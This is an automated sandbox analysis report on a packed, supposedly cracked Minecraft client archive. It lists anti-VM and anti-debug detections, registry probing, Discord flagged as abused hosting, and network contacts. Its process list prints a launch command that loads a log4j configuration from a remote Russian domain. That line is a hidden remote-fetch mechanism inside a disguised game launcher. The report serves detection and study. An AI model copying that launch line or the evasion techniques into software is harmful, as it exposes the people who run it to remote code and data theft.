Analysis Overview
SHA256
12c03ef329d173728898959b9f406d2fcecec97b21489ab1f8f9acca5066b036
Threat Level: Likely malicious
The file nightware_pasted.zip was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
Themida packer
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-11 12:54
Signatures
Themida packer
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 12:53
Reported
2024-06-11 12:59
Platform
win11-20240426-en
Max time kernel
274s
Max time network
271s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Themida packer
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2551177587-3778486488-1329702901-1000\{53AD200A-852E-43D8-B5AB-B07AAFDC3AD1} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\nightware_pasted.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "
C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "
C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client
C:\Windows\SYSTEM32\rundll32.exe
rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "
C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client
C:\Windows\SYSTEM32\rundll32.exe
rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.19:443 | | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| GB | 95.101.143.201:443 | | tcp |
| US | 52.168.117.174:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| US | 162.159.136.234:443 | discord.gg | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| NL | 23.62.61.160:443 | r.bing.com | tcp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| US | 162.159.137.232:443 | status.discord.com | tcp |
| US | 104.26.9.90:80 | optifine.net | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 127.0.0.1:6463 | | tcp |
| N/A | 127.0.0.1:6464 | | tcp |
| N/A | 127.0.0.1:6465 | | tcp |
| N/A | 127.0.0.1:6466 | | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.19.229.21:443 | api.hcaptcha.com | tcp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| N/A | 127.0.0.1:6467 | | tcp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| N/A | 127.0.0.1:6468 | | tcp |
| US | 104.19.230.21:443 | api.hcaptcha.com | tcp |
| N/A | 127.0.0.1:6469 | | tcp |
| N/A | 127.0.0.1:6470 | | tcp |
| N/A | 127.0.0.1:6471 | | tcp |
| N/A | 127.0.0.1:6472 | | tcp |
| US | 162.159.136.234:443 | discord.gg | tcp |
| US | 162.159.128.233:443 | status.discord.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 13.107.246.64:443 | fp-afd-nocache-ccp.azureedge.net | tcp |
| US | 13.107.136.254:443 | spo-ring.msedge.net | tcp |
| US | 162.159.136.234:443 | discord.gg | tcp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| RU | 81.90.181.184:443 | sk3dsuite.ru | tcp |
| US | 52.123.128.254:443 | dual-s-ring.msedge.net | tcp |
| US | 104.26.9.90:80 | optifine.net | tcp |
| N/A | 127.0.0.1:6463 | | tcp |
| N/A | 127.0.0.1:6464 | | tcp |
| N/A | 127.0.0.1:6465 | | tcp |
| N/A | 127.0.0.1:6466 | | tcp |
| N/A | 127.0.0.1:6467 | | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| N/A | 127.0.0.1:6468 | | tcp |
| N/A | 127.0.0.1:6469 | | tcp |
| N/A | 127.0.0.1:6470 | | tcp |
| N/A | 127.0.0.1:6471 | | tcp |
| N/A | 127.0.0.1:6472 | | tcp |
Files